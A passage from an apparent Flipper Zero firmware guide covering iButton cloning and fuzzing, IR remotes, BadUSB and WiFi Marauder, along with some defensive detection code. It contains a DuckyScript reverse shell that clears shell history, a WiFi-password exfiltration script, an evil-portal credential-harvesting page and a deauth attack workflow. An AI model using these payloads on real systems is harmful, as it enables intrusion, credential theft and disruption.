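            # slave's presence pulse; a bus with no slave would show no pulse here at all.
            events.append(("presence",))
            expect_presence = False
        else:
            bits.append(1 if width < WRITE_1_MAX_US else 0)
    flush()
    return events

if __name__ == "__main__":
    rom = bytes.fromhex("01A456789BCDEF3A")   # the 8-byte example ID used on this page
    for event in decode_pulses(read_rom_transaction(rom)):
        print(event)
```

The decoded `data` event starts with the 0x33 command byte the master wrote, followed by the eight ROM bytes the key answered with; both travel over the same wire, which is why a passive tap on the data line sees the entire exchange.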
🧬 The 8-Byte Data Format
Intermediate

Every Dallas iButton transmits exactly 8 bytes (64 bits):

Byte:      1            2-7              8
       ┌──────┬─────────────────────┬──────┐
       │ 0x01 │ A4 56 78 9B CD EF   │ 0x3A │
       └──────┴─────────────────────┴──────┘
        Family    Serial Number       CRC-8

Breakdown

  • Byte 1 — Family Code: Identifies the chip type. 0x01 = DS1990A (most common access key)
  • Bytes 2–7 — Serial Number: 48-bit unique ID. 281 trillion possible combinations.
  • Byte 8 — CRC-8: Dallas polynomial checksum. Catches transmission errors.

Common Family Codes

Code | Chip | Purpose
0x01 | DS1990A | Serial number iButton (access control)
0x09 | DS1982 | 1 Kbit EPROM memory
0x10 | DS18S20 | Temperature sensor
0x28 | DS18B20 | Temperature sensor (most common)
0x22 | DS1822 | Econo temperature sensor
0x33 | DS1963S | SHA-1 protected iButton
Practical Tip
When Flipper reads an iButton, it shows the full 8-byte hex string. If you see 01 as the first byte — that's a standard DS1990A access key. This is what 95% of building intercoms use.
🔀 Three iButton Protocols
📋 Dallas vs Cyfral vs Metakom — Protocol Comparison
Intermediate

Not all iButtons speak the same language. There are three distinct protocols, and the Flipper supports all of them.

Protocol | Origin | Key Length | Encoding | Common In
Dallas | USA (Maxim/Dallas Semi) | 8 bytes | 1-Wire digital | Worldwide
Cyfral | Russia | 2 bytes | Resistance-based | Russia, CIS
Metakom | Russia | 4 bytes | Resistance + parity | Russia, CIS

Dallas (DS1990A)

  • The global standard — used almost everywhere iButtons exist
  • Uses the 1-Wire digital protocol described above
  • Cheapest to clone — writable blanks cost $0.50–1 each
  • Zero encryption, zero authentication — just an ID number

Cyfral

  • Russian-developed protocol using current/resistance instead of voltage levels
  • Only 2 bytes (16 bits) — far fewer possible IDs
  • Different electrical signaling makes it trickier to duplicate
  • Common in older Russian and CIS-country intercoms

Metakom

  • Another Russian protocol, similar to Cyfral but with parity checking
  • 4 bytes (32 bits) — more IDs than Cyfral, fewer than Dallas
  • Also resistance-based signaling
  • Found alongside Cyfral in Russian apartment buildings
Flipper Does All Three
When you read an iButton, Flipper auto-detects the protocol. You don't need to know which type it is beforehand — just press the key and Flipper figures it out.
📖 Reading & Emulating
📖 Read — Capturing a Key
Beginner

Reading an iButton is instant — just press the key against the Flipper's iButton pad.

Navigate to iButton → Read on your Flipper
Press the key against the iButton pad (bottom-left of device)
Flipper auto-detects the protocol (Dallas, Cyfral, or Metakom)
Screen shows: protocol type + ID in hex
Choose to Save to SD card or Emulate immediately
Pin Layout
The iButton pad has two sets of pins. Reading uses the RIGHT two pins. This is different from emulation — keep this in mind if things aren't working.
📤 Emulate — Acting as a Key
Beginner

Once you've saved a key, you can turn your Flipper into that key.

Go to iButton → Saved → select your key
Tap Emulate
Press the Flipper's iButton pad against the door reader
If the ID matches — the door opens

Tips for Stubborn Readers

  • Emulation uses the LEFT two pins on the iButton pad (different from read!)
  • ~80% of readers work on the first try
  • For recessed or awkward readers, use GPIO pins with wires to extend the contacts
  • The Flipper only emulates one key at a time — no auto-cycling
  • Try different angles and pressures — some readers need firm, centered contact
Left vs Right
This catches everyone at first: Read = right pins, Emulate = left pins. If you're pressing against a reader and nothing happens, you might be using the wrong side of the pad.
✏️ Add Manually — Enter an ID by Hand
Intermediate

Don't have the physical key? You can enter the ID manually.

Go to iButton → Add Manually
Select protocol: Dallas, Cyfral, or Metakom
Type the hex bytes of the ID
Save — now you can emulate or write it
Watch the Byte Order
The ID engraved on physical keys is sometimes in reverse order or missing some bytes. If a manually entered ID doesn't work, try reversing the byte order. Example: if the key shows EF CD 9B 78 56 A4, the actual serial might be A4 56 78 9B CD EF.
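The CRC-8 byte described in the 8-byte data format section is the tool for settling the byte-order question: only one orientation of a correctly copied ID will have a last byte that matches the CRC of the first seven. The following added example (not Flipper or Momentum code) implements the Dallas CRC-8 (polynomial x^8 + x^5 + x^4 + 1, processed LSB first as 1-Wire devices do), validates an 8-byte ROM, assembles a full ROM from a family code and a 6-byte serial, and picks the orientation of an engraved ID that checks out. It uses the family code and serial bytes from the diagram above and computes the check byte itself rather than copying it from the diagram, which is exactly the check to run before emulating a hand-typed key.

```python
# Dallas/1-Wire ROM ID checker (added example, not Flipper or Momentum code).
from typing import Optional

def dallas_crc8(data: bytes) -> int:
    """CRC-8/MAXIM: polynomial x^8 + x^5 + x^4 + 1, LSB-first, initial value 0."""
    crc = 0
    for byte in data:
        crc ^= byte
        for _ in range(8):
            # 0x8C is the bit-reversed form of the polynomial 0x31
            crc = (crc >> 1) ^ 0x8C if crc & 1 else crc >> 1
    return crc

def rom_is_valid(rom: bytes) -> bool:
    """True when the 8th byte is the CRC of the first seven (family code + 6-byte serial)."""
    return len(rom) == 8 and dallas_crc8(rom[:7]) == rom[7]

def build_rom(family: int, serial: bytes) -> bytes:
    """Assemble family code + 48-bit serial + CRC, e.g. for a key entered under Add Manually."""
    if len(serial) != 6:
        raise ValueError("1-Wire serial numbers are 6 bytes")
    body = bytes([family]) + serial
    return body + bytes([dallas_crc8(body)])

def normalize_rom(rom: bytes) -> Optional[bytes]:
    """Engravings often list the bytes CRC-first. Return the orientation whose CRC
    checks out (family code first, as Flipper shows it), or None if neither does."""
    for candidate in (rom, rom[::-1]):
        if rom_is_valid(candidate):
            return candidate
    return None

def parse_hex(text: str) -> bytes:
    """Accept '01A456789BCDEF7C' or '01 A4 56 78 9B CD EF 7C'."""
    return bytes.fromhex(text.replace(" ", ""))

if __name__ == "__main__":
    # Family 0x01 (DS1990A) with the serial bytes from the diagram; the CRC is computed
    rom = build_rom(0x01, parse_hex("A4 56 78 9B CD EF"))
    print(rom.hex(" ").upper(), "valid:", rom_is_valid(rom))
    # The same ID as it might be read off an engraving, last byte first
    print(normalize_rom(rom[::-1]).hex(" ").upper())
```

A ROM that fails in both orientations was miscopied (or is missing bytes, as the tip above warns); a ROM of all zeros passes trivially because the CRC of zeros is zero, so an all-zero ID should be treated as "no key", not as a valid one.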
📝 Cloning & Writing to Blank Keys
💾 Writing to Blank Keys — Physical Cloning
Intermediate🐬🐬🐬

Unlike emulation (which uses your Flipper as the key), writing creates a permanent physical clone on a blank iButton.

Writable Blank Keys

Blank Type | Protocol | Price | Notes
RW1990 | Dallas | $0.50–1 | Most common writable blank. Re-writable.
TM2004 | Dallas | $1–2 | Also rewritable, slightly newer.
TM01C | Multi-protocol | $2–3 | Supports Dallas, Cyfral, and Metakom.

How to Clone

First, read and save the original key (iButton → Read → Save)
Go to iButton → Saved → select the key → Write
Press the blank against the iButton pad
Flipper writes the ID in ~2 seconds — done!
⚠️ Finalization Warning
Some blank keys can be "finalized" — permanently locked so they can never be rewritten. This is irreversible. Be cautious with unknown blanks, and always test with a known-fresh RW1990 first. Some intercom systems intentionally try to finalize your key on read to prevent clones.
Where to Buy
Search AliExpress or Amazon for "RW1990 iButton writable" or "TM01C iButton blank". A pack of 10 costs $5–10. Make sure they explicitly say "writable" or "rewritable" — standard DS1990A keys are read-only.
🚀 Momentum Firmware Extras
🎲 iButton Fuzzer — Brute-Force Testing
Advanced🐬🐬🐬

The iButton Fuzzer app tries random or sequential IDs against a reader to test if any are valid. This is a brute-force access test.

  • Select protocol (Dallas, Cyfral, or Metakom)
  • Choose attack mode: random, sequential, or custom range
  • Press the Flipper's iButton pad against the reader
  • Flipper cycles through IDs rapidly
  • If the door opens — you've found a valid ID
Realism Check
Dallas has 2^48 possible serial numbers (281 trillion). Brute-forcing Dallas is statistically impractical. Cyfral (2^16 = 65,536 IDs) and Metakom (2^32 = 4 billion) are more feasible. This tool is mainly useful for testing Cyfral intercoms or systems with predictable ID patterns.
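Both the RFID Fuzzer (in the 125 kHz section, whose warning notes that most systems log the failed attempts) and the iButton Fuzzer above produce the same signature on the reader side: a burst of denied reads from IDs the system has never seen, often sequential. This added example (not Flipper or Momentum code, and the log line format is constructed for the example rather than any vendor's) shows the detection a defender would run over an access-control log: alert when a reader sees a threshold of distinct denied IDs inside a short window, and report whether the IDs were consecutive, which separates a sequential sweep from random IDs or from one confused visitor with the wrong card. The card field is hex, so the same code works for an intercom log of 8-byte iButton IDs.

```python
# Detecting card-ID brute forcing in an access-control log (added example; the log
# format "<iso-timestamp> reader=<name> card=<hex> result=<GRANTED|DENIED>" is constructed).
from collections import defaultdict, deque
from datetime import datetime

def parse_line(line: str) -> dict:
    ts_text, *fields = line.split()
    rec = {"ts": datetime.fromisoformat(ts_text)}
    for field in fields:
        key, _, value = field.partition("=")
        rec[key] = value
    return rec

def find_bruteforce(lines, window_s=60, threshold=5):
    """One alert per reader, raised the first time `threshold` distinct denied card IDs
    are seen at it within `window_s` seconds."""
    recent = defaultdict(deque)   # reader -> deque of (timestamp, card_id)
    alerted = set()
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec.get("result") != "DENIED":
            continue
        reader, ts = rec["reader"], rec["ts"]
        q = recent[reader]
        q.append((ts, int(rec["card"], 16)))
        while (ts - q[0][0]).total_seconds() > window_s:   # slide the window
            q.popleft()
        distinct = sorted({cid for _, cid in q})
        if len(distinct) >= threshold and reader not in alerted:
            sequential = sum(1 for a, b in zip(distinct, distinct[1:]) if b - a == 1)
            alerts.append({
                "reader": reader,
                "first_seen": q[0][0].isoformat(),
                "last_seen": ts.isoformat(),
                "distinct_ids": len(distinct),
                "sequential_pairs": sequential,
                # more than half of the adjacent IDs consecutive: a sequential sweep
                "pattern": "sequential" if sequential * 2 > len(distinct) - 1 else "random/custom",
            })
            alerted.add(reader)
    return alerts

# Constructed sample: a sequential sweep at the lobby reader amid normal traffic
SAMPLE_LOG = """\
2024-05-01T08:00:00 reader=lobby card=6A01234567 result=GRANTED
2024-05-01T08:00:05 reader=garage card=6A01234568 result=DENIED
2024-05-01T08:01:10 reader=lobby card=0000000001 result=DENIED
2024-05-01T08:01:11 reader=lobby card=0000000002 result=DENIED
2024-05-01T08:01:11 reader=lobby card=0000000003 result=DENIED
2024-05-01T08:01:12 reader=lobby card=0000000004 result=DENIED
2024-05-01T08:01:13 reader=lobby card=0000000005 result=DENIED
2024-05-01T08:01:14 reader=lobby card=0000000006 result=DENIED
2024-05-01T08:02:30 reader=lobby card=6A01234567 result=GRANTED
""".splitlines()

if __name__ == "__main__":
    for alert in find_bruteforce(SAMPLE_LOG):
        print(alert)
```

The threshold and window are the knobs to tune per site: a single denied read is everyday noise, five distinct unknown IDs at one door in a minute is not something a legitimate cardholder produces.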
🔄 iButton Converter
Intermediate

Convert between different iButton file formats. Useful when sharing keys between different Flipper firmware versions or converting community-shared key files.

💻 CLI Commands
Command | Description | Example
ikey read | Read an iButton key | ikey read
ikey emulate | Emulate a specific key | ikey emulate Dallas 01A456789BCDEF3A
ikey write | Write ID to a blank key | ikey write Dallas 01A456789BCDEF3A
🔓 Security Assessment
🔓 How Secure is iButton? (Spoiler: It's Not)
Beginner

iButton Dallas is extremely insecure by modern standards. Here's the breakdown:

The Weaknesses

  • No encryption — the ID is transmitted in plaintext every time
  • No challenge-response — unlike NFC MIFARE, there's no authentication handshake
  • Trivially cloneable — anyone who touches your key for 2 seconds can copy it forever
  • Static ID — the key sends the same data every time, no rolling codes
  • No mutual authentication — the key trusts any reader, the reader trusts any key with the right ID

Intercom "Defenses" (Easily Defeated)

  • Some intercoms try to overwrite/finalize keys on read — this just locks the blank, doesn't prevent future clones from other blanks
  • Some systems use whitelists (only registered IDs work) — but there's no way to prevent reading the ID off a valid key
  • The only real security is physical: you need to touch the key to read it

Comparison to NFC

Feature | iButton (Dallas) | NFC (MIFARE Classic) | NFC (DESFire)
Encryption | ❌ None | ⚠️ Weak (Crypto-1) | ✅ AES-128
Authentication | ❌ None | ⚠️ Broken | ✅ Mutual auth
Clone difficulty | Trivial | Minutes | Extremely hard
Rolling codes | ❌ No | ❌ No | ✅ Optional
Bottom Line
If your building uses iButton for access control, it's essentially "security by convenience." Anyone with a Flipper (or a $3 Arduino) and brief physical access to a valid key can clone it permanently. The real question is whether your building's threat model warrants upgrading to NFC or mobile-based access.
🛠️ Cool Projects
💡 iButton Project Ideas
Beginner🐬🐬🐬🐬

Building Access

  • Consolidate your keys — read all your building's iButton keys onto one Flipper. Front door, back door, garage, elevator — all on one device.
  • Audit your intercom — use the iButton Fuzzer on your own building's intercom to test if predictable IDs work. Report findings to building management.
  • Backup your keys — clone your keys onto RW1990 blanks. Keep spares in your wallet, car, bag.

Beyond Access Control

  • Temperature logging — read DS18B20 temperature sensors through the iButton pad (same 1-Wire protocol)
  • DIY access system — build your own iButton reader with an Arduino + DS9092 probe. Great for learning 1-Wire.
  • Key inventory — read and catalog every iButton key in your household. Know exactly what you have.
Legality Note
Cloning your own keys for backup is legal everywhere. Testing systems you own or have permission to test is fine. Cloning someone else's key without consent is unauthorized access — don't do it.
🔴 Infrared

Control any IR device — TVs, ACs, projectors, fans, audio systems, and more. Comes with a universal remote database plus the ability to learn any remote signal.

📺 Universal Remotes
Beginner🐬🐬🐬🐬🐬

Pre-built remote databases that work with thousands of devices out of the box. No learning required.

Remote Type | Functions | Supported Brands
📺 TV | Power, Volume, Channel, Mute, Input, Menu | Samsung, LG, Sony, Vizio, TCL, Hisense, Panasonic, Philips, Sharp, Toshiba, and 100+ more
❄️ AC | Power, Temp Up/Down, Mode, Fan Speed, Swing | Daikin, Mitsubishi, LG, Samsung, Carrier, Fujitsu, Gree, Haier, Toshiba, and 200+ more
🔊 Audio | Power, Volume, Mute, Source | Bose, Sony, JBL, Samsung, LG, Yamaha, Denon, and more
📽️ Projector | Power, Input, Volume | Epson, BenQ, ViewSonic, Optoma, and more
🌀 Fan | Power, Speed, Oscillation | Various brands
Tip
The TV universal remote tries codes for multiple brands sequentially. Press "Power" repeatedly while pointing at the TV — it cycles through codes until one works.
📡 Learn New Remote
Beginner

Point any existing IR remote at the Flipper to capture individual button signals.

  • Go to Infrared → Learn New Remote
  • Point the remote at Flipper's IR receiver (top of device)
  • Press a button on the remote — Flipper captures the signal
  • Name the button (e.g., "Power", "Vol Up") and save
  • Repeat for each button you want to capture
  • Result: a custom remote file on your SD card
Momentum IR Apps
🎛️ Cross Remote
Create macro remotes that combine signals from multiple devices. One button press can power on TV + soundbar + set input + dim lights.
Intermediate🐬🐬🐬🐬
🎮 Xbox Controller
Control Xbox consoles via IR. Power on/off, navigate menus, media playback controls.
Beginner🐬🐬
❄️ Hitachi AC Remote
Dedicated Hitachi air conditioner controller with all modes, fan speeds, and temperature control.
Beginner🐬🐬
❄️ Midea AC Remote
Dedicated Midea air conditioner controller.
Beginner🐬🐬
❄️ Mitsubishi AC Remote
Dedicated Mitsubishi air conditioner controller with Electric, Dehumidify, and Auto modes.
Beginner🐬🐬
📏 LIDAR Emulator
Emulates LIDAR signals. Experimental — for research purposes only.
Expert🐬🐬🐬
📋 Supported Protocols
NEC, NECext, NEC42, Samsung32, RC6, RC5, RC5X, SIRC, SIRC15, SIRC20, Kaseikyo, RCA, Pioneer, Raw (any signal)
💻 CLI Commands
Command | Description | Example
ir tx | Transmit decoded IR signal | ir tx NEC 04 08
ir rx | Receive and decode IR signal | ir rx or ir rx raw
ir universal list | List available universal remotes | ir universal list tv
ir universal | Send universal remote signal | ir universal tv POWER
⌨️ BadUSB + Bad Keyboard

Turn the Flipper into a keyboard that types at superhuman speed. Execute scripts, exfiltrate data, or deploy payloads — via USB or wirelessly over Bluetooth.

🔌 BadUSB (USB HID)
Intermediate🐬🐬🐬🐬🐬

Plug the Flipper into a computer's USB port. It registers as a keyboard and types pre-programmed keystrokes at ~200 characters/second.

How It Works
  • Flipper identifies as a USB HID keyboard (no drivers needed)
  • Executes DuckyScript files (.txt) from the SD card
  • Compatible with Hak5 Rubber Ducky scripts
  • Works on Windows, macOS, Linux, Android (with OTG)
Pre-loaded Scripts
  • Demo scripts — opens Notepad and types a message
  • qFlipper installer — downloads and installs the Flipper management tool
Creating Custom Scripts

Create .txt files in /ext/badusb/ on the SD card:

REM Open terminal and execute command
DELAY 500
GUI r
DELAY 300
STRING cmd
ENTER
DELAY 500
STRING echo Hello from Flipper Zero!
ENTER
📡 Bad Keyboard — Wireless BadUSB (Momentum)
Intermediate🐬🐬🐬🐬🐬

Momentum exclusive. Same concept as BadUSB, but over Bluetooth. No USB cable needed.

How It Works
  • Flipper advertises as a Bluetooth keyboard
  • Target device pairs (or auto-pairs if enabled)
  • Flipper executes DuckyScript wirelessly
  • Works from up to 10 meters away
Why This Is Powerful
  • No physical access needed — just Bluetooth range
  • Works on locked phones (some Android versions accept BT keyboard input on lock screen for certain functions)
  • Leave-behind attack — pair, walk away, execute later
  • Uses the same DuckyScript files as USB BadUSB
Warning
The target device must accept the Bluetooth pairing. Most phones require user confirmation. Some older Android versions and IoT devices auto-pair with BT keyboards.
📝 Example Scripts
🐚 Reverse Shell (Linux/macOS)
Advanced
REM Reverse shell — change IP:PORT to your listener
DELAY 500
CTRL ALT t
DELAY 800
STRING bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
ENTER
DELAY 200
REM Clear terminal history
STRING history -c && exit
ENTER
Legal Warning
Deploying reverse shells on systems you don't own is illegal. Use only in authorized penetration tests.
📶 WiFi Password Exfiltrator (Windows)
Intermediate
REM Extract saved WiFi passwords (Windows)
DELAY 500
GUI r
DELAY 300
STRING powershell -w hidden -c "(netsh wlan show profiles) | Select-String 'All User' | ForEach-Object {$_ -replace '.*:\s+',''} | ForEach-Object {netsh wlan show profile name=$_ key=clear} | Out-File $env:TEMP\wifi.txt; Invoke-WebRequest -Uri 'https://your-server.com/collect' -Method POST -Body (Get-Content $env:TEMP\wifi.txt -Raw)"
ENTER
🎵 Browser Rickroll
Beginner
REM Classic rickroll — opens in default browser
DELAY 500
GUI r
DELAY 300
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTER
ℹ️ System Info Grabber (Windows)
Intermediate
REM Gather system info and save to USB drive
DELAY 500
GUI r
DELAY 300
STRING powershell -w hidden -c "$i = systeminfo; $n = ipconfig /all; $w = netsh wlan show profiles; $u = whoami /all; ($i + $n + $w + $u) | Out-File $env:TEMP\sysinfo.txt"
ENTER
📖 DuckyScript Reference
📖 Complete DuckyScript Command Reference
Command | Description | Example
STRING | Type a string of characters | STRING Hello World
STRINGLN | Type string + Enter | STRINGLN dir /b
DELAY | Wait N milliseconds | DELAY 500
ENTER | Press Enter key | ENTER
GUI / WINDOWS | Windows/Super key | GUI r (Win+R)
ALT | Alt key (+ combo) | ALT F4
CTRL | Control key (+ combo) | CTRL c
SHIFT | Shift key (+ combo) | SHIFT TAB
TAB | Tab key | TAB
ESC / ESCAPE | Escape key | ESC
UP/DOWN/LEFT/RIGHT | Arrow keys | DOWN DOWN ENTER
CAPSLOCK | Caps Lock | CAPSLOCK
DELETE | Delete key | DELETE
BACKSPACE | Backspace key | BACKSPACE
HOME / END | Home/End keys | HOME
INSERT | Insert key | INSERT
PAGEUP / PAGEDOWN | Page Up/Down | PAGEUP
PRINTSCREEN | Print Screen | PRINTSCREEN
MENU / APP | Context menu key | MENU
F1–F12 | Function keys | F5
REM | Comment (not executed) | REM This is a comment
REPEAT | Repeat previous line N times | REPEAT 5
DEFAULTDELAY | Set default delay between lines | DEFAULTDELAY 100
SYSRQ | System Request key (Linux) | SYSRQ
DuckyScript 3.0 Advanced (Momentum Support)
REM Variables and conditionals
VAR $COUNT = 0
WHILE ($COUNT < 5)
STRING Iteration:
STRING $COUNT
ENTER
$COUNT = ($COUNT + 1)
DELAY 200
END_WHILE
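The command reference above is also all that is needed to triage a payload file without running it, which is the first thing to do with a BadUSB script found on an SD card or handed in after a test. This added example (not Flipper or Momentum code) walks a script using the 1.0-style commands from the reference, expands REPEAT and DEFAULTDELAY, and reports what the script would type, which key combinations it presses, roughly how long it would run at the ~200 characters/second rate quoted for BadUSB on this page, and any URLs in the typed text. The VAR/WHILE extensions shown just above are deliberately not interpreted; they are reported as unknown commands. The sample payload is constructed for the example.

```python
# DuckyScript static triage (added example, not Flipper or Momentum code).
import re

KEY_WORDS = {
    "ENTER", "GUI", "WINDOWS", "ALT", "CTRL", "CONTROL", "SHIFT", "TAB", "ESC", "ESCAPE",
    "UP", "DOWN", "LEFT", "RIGHT", "CAPSLOCK", "DELETE", "BACKSPACE", "HOME", "END",
    "INSERT", "PAGEUP", "PAGEDOWN", "PRINTSCREEN", "MENU", "APP", "SYSRQ", "SPACE",
} | {f"F{n}" for n in range(1, 13)}

CHARS_PER_SECOND = 200   # typing rate this page quotes for BadUSB

def analyze(script: str) -> dict:
    """Interpret a DuckyScript 1.0 payload without executing it; return a summary."""
    typed, keys, urls, unknown = [], [], [], []
    delay_ms = 0
    default_delay = 0
    previous = None          # last executable (cmd, arg), for REPEAT

    def run(cmd: str, arg: str):
        nonlocal delay_ms
        if cmd == "DELAY":
            delay_ms += int(arg)
        elif cmd in ("STRING", "STRINGLN"):
            typed.append(arg + ("\n" if cmd == "STRINGLN" else ""))
            delay_ms += len(arg) * 1000 // CHARS_PER_SECOND
            urls.extend(re.findall(r"https?://[^\s'\"]+", arg))
        elif cmd in KEY_WORDS:
            keys.append((cmd + " " + arg).strip())
        else:
            unknown.append(cmd)

    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "REM":
            continue
        if cmd in ("DEFAULTDELAY", "DEFAULT_DELAY"):
            default_delay = int(arg)
            continue
        if cmd == "REPEAT":
            if previous:
                for _ in range(int(arg)):
                    run(*previous)
                    delay_ms += default_delay
            continue
        run(cmd, arg)
        delay_ms += default_delay
        previous = (cmd, arg)

    return {"typed": typed, "keys": keys, "urls": urls,
            "estimated_ms": delay_ms, "unknown_commands": unknown}

# Constructed sample payload in the style of the examples above
SAMPLE = """\
REM Open the Run dialog and type a line
DEFAULTDELAY 100
GUI r
DELAY 300
STRING notepad
ENTER
DELAY 500
STRINGLN Visit https://example.invalid/report for the write-up
REPEAT 2
"""

if __name__ == "__main__":
    for key, value in analyze(SAMPLE).items():
        print(f"{key}: {value}")
```

The `estimated_ms` figure is useful in its own right: it bounds how long the device has to stay plugged in, which is the window a host-side control (USB device allow-listing, keystroke-rate anomaly detection) has to react.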
📶 WiFi Dev Board + Marauder

The WiFi Dev Board (ESP32-S2) turns your Flipper into a WiFi hacking platform. ESP32 Marauder is the most popular firmware — providing WiFi scanning, deauth attacks, beacon spam, packet capture, evil portals, and more.

🔧 Setup & Installation
Intermediate

Hardware

  • Official WiFi Dev Board — ESP32-S2 based, plugs directly into Flipper GPIO
  • Third-party ESP32 boards — ESP32-WROOM, ESP32-S3, etc. (need wiring)
  • Connected via UART over GPIO (pins 13/14 for TX/RX)

Flash Marauder

Go to ESP32Marauder Wiki and download the latest firmware for your board.
Use esptool.py or the web flasher at espressif.github.io/esptool-js to flash.
Connect the board to Flipper's GPIO header. Power from Flipper's 3.3V or 5V pin.
On Flipper: GPIO → ESP32 → Marauder (or ESP → WiFi Marauder in Momentum).
Tip
Momentum comes with the WiFi Marauder companion app pre-installed. No need to install it separately.
📡 Marauder Scan Commands
🔍 Scan Commands
Command | Description | Notes
scanap | Scan for WiFi access points | Lists all visible APs with SSID, BSSID, channel, RSSI
scansta | Scan for WiFi stations (clients) | Shows connected devices and their associated APs
sniffbeacon | Sniff beacon frames | Passive — captures AP advertisements
sniffdeauth | Sniff deauth frames | Detect deauth attacks in progress
sniffpmkid | Sniff PMKID frames | Capture PMKID for offline cracking (WPA2)
sniffpwnagotchi | Detect nearby Pwnagotchis | Identifies Pwnagotchi devices via beacon frames
sniffprobe | Sniff probe requests | See what networks nearby devices are looking for
sniffraw | Raw 802.11 packet capture | Saves to PCAP for Wireshark analysis
sniffesp | Sniff ESP-NOW protocol | Captures ESP-NOW packets between ESP32 devices
stopscan | Stop any running scan/attack | Always run this before starting a new scan
⚔️ Marauder Attack Commands
💥 Attack Commands
Command | Description | Target
attack -t deauth | Deauthentication attack — kicks clients off WiFi | Selected AP or all
attack -t beacon -l | Beacon spam from list — floods area with fake SSIDs | From saved list
attack -t beacon -r | Beacon spam with random SSIDs | Random names
attack -t beacon -rr | Rickroll beacon spam — floods with Rick Astley lyrics | Rickroll SSIDs
attack -t probe | Probe request flood | Selected APs
attack -t deauth -c | Targeted deauth on specific channel | Specific channel
Typical Attack Workflow
# 1. Scan for access points
scanap
# 2. Wait 5-10 seconds, then stop
stopscan
# 3. List discovered APs
list -a
# 4. Select target AP (by number from list)
select -a 3
# 5. Deauth the target
attack -t deauth
# 6. Stop when done
stopscan
Legal Warning
Deauth attacks and WiFi jamming are illegal in most jurisdictions without authorization. Only use on networks you own or have explicit written permission to test.
📦 Marauder Selection & List Commands
📋 Selection & Management Commands
Command | Description
list -a | List scanned access points
list -s | List scanned stations (clients)
list -c | List scanned SSIDs for clone portal
select -a <n> | Select an AP by index number
select -s <n> | Select a station by index number
select -a all | Select all APs
clearlist -a | Clear AP list
clearlist -s | Clear station list
channel <n> | Set WiFi channel (1-14)
channel -h | Enable channel hopping
update | Check for firmware updates
reboot | Reboot the ESP32
🎭 Evil Portal
🎭 Evil Portal — Captive Portal Attacks
Advanced🐬🐬🐬🐬🐬

Creates a fake WiFi captive portal (like hotel/airport WiFi login pages) to harvest credentials.

How It Works
ESP32 creates an open WiFi network with an enticing name (e.g., "Free Airport WiFi")
Victim connects — automatically redirected to your fake login page
Victim enters credentials (email, password, etc.) thinking it's a real portal
Credentials are logged to the SD card and displayed on Flipper's screen
Setup
  • Upload HTML templates to SD card: /ext/portal/
  • Templates available: Google login, Facebook, WiFi portal, Microsoft, custom
  • Marauder command: evil portal or configure via the companion app
Creating Custom Portal Pages
<!-- Save as /ext/portal/custom.html -->
<html>
<head><title>WiFi Login</title></head>
<body style="font-family:sans-serif;text-align:center;padding:40px">
<h2>Welcome to Free WiFi</h2>
<p>Please sign in to continue:</p>
<form action="/login" method="POST">
<input name="email" placeholder="Email" style="padding:10px;width:250px"><br><br>
<input name="password" type="password" placeholder="Password" style="padding:10px;width:250px"><br><br>
<button type="submit" style="padding:10px 30px">Connect</button>
</form>
</body>
</html>
Legal Warning
Credential harvesting is illegal without explicit authorization. Evil portals are for authorized security assessments only.
📦 Marauder Sniffer Commands
📡 Packet Capture & Analysis
Command | Captures | Output
sniffraw | All 802.11 frames | PCAP file on SD card
sniffpmkid | PMKID from WPA2 APs | For hashcat cracking
sniffbeacon | Beacon frames only | AP enumeration
sniffprobe | Probe requests | Client network history
sniffdeauth | Deauth frames | Detect attacks
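sniffdeauth shows deauth frames live; the PCAP that sniffraw writes lets you do the same analysis offline and attribute a flood to a transmitter. This added example (not Marauder or Momentum code) reads a classic PCAP in pure Python, handles link types 105 (raw 802.11) and 127 (radiotap header first; whether a given build of the capture tool writes radiotap is an assumption, so both are supported), parses the 802.11 MAC header, and counts deauthentication and disassociation frames per transmitter address in a sliding window. A legitimate AP sends these rarely; dozens per second from one address, addressed to broadcast, is the signature of the attack in the table above. The sample capture is constructed in memory.

```python
# Deauth-flood detector over a classic PCAP (added example; not Marauder or Momentum code).
import struct
from collections import defaultdict

LINKTYPE_IEEE802_11 = 105
LINKTYPE_RADIOTAP = 127

def iter_pcap(data: bytes):
    """Yield (timestamp_seconds, frame_bytes) from a classic pcap held in memory."""
    magic = data[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    linktype = struct.unpack(endian + "I", data[20:24])[0]
    offset = 24
    while offset + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _ = struct.unpack(endian + "IIII", data[offset:offset + 16])
        frame = data[offset + 16 : offset + 16 + incl_len]
        offset += 16 + incl_len
        if linktype == LINKTYPE_RADIOTAP:
            rt_len = struct.unpack("<H", frame[2:4])[0]   # radiotap length field is little-endian
            frame = frame[rt_len:]
        elif linktype != LINKTYPE_IEEE802_11:
            raise ValueError(f"unsupported link type {linktype}")
        yield ts_sec + ts_usec / 1e6, frame

def parse_80211(frame: bytes):
    """Return (type, subtype, addr1, addr2, reason_code); reason is None unless the
    frame is a deauthentication (subtype 12) or disassociation (subtype 10)."""
    if len(frame) < 24:
        return None, None, "", "", None
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    addr1, addr2 = frame[4:10].hex(":"), frame[10:16].hex(":")
    reason = None
    if ftype == 0 and subtype in (10, 12) and len(frame) >= 26:
        reason = struct.unpack("<H", frame[24:26])[0]
    return ftype, subtype, addr1, addr2, reason

def detect_deauth_flood(pcap: bytes, window_s=1.0, threshold=10):
    """Per transmitter (addr2), count deauth/disassoc frames in a sliding window.
    Returns {transmitter: peak_count} for transmitters that crossed the threshold."""
    seen = defaultdict(list)
    peaks = {}
    for ts, frame in iter_pcap(pcap):
        _, _, _, src, reason = parse_80211(frame)
        if reason is None:
            continue
        times = seen[src]
        times.append(ts)
        while ts - times[0] > window_s:
            times.pop(0)
        if len(times) >= threshold:
            peaks[src] = max(peaks.get(src, 0), len(times))
    return peaks

# --- constructed sample capture (in memory, never transmitted) ---
def _pcap(frames, linktype=LINKTYPE_IEEE802_11) -> bytes:
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)
    for ts, frame in frames:
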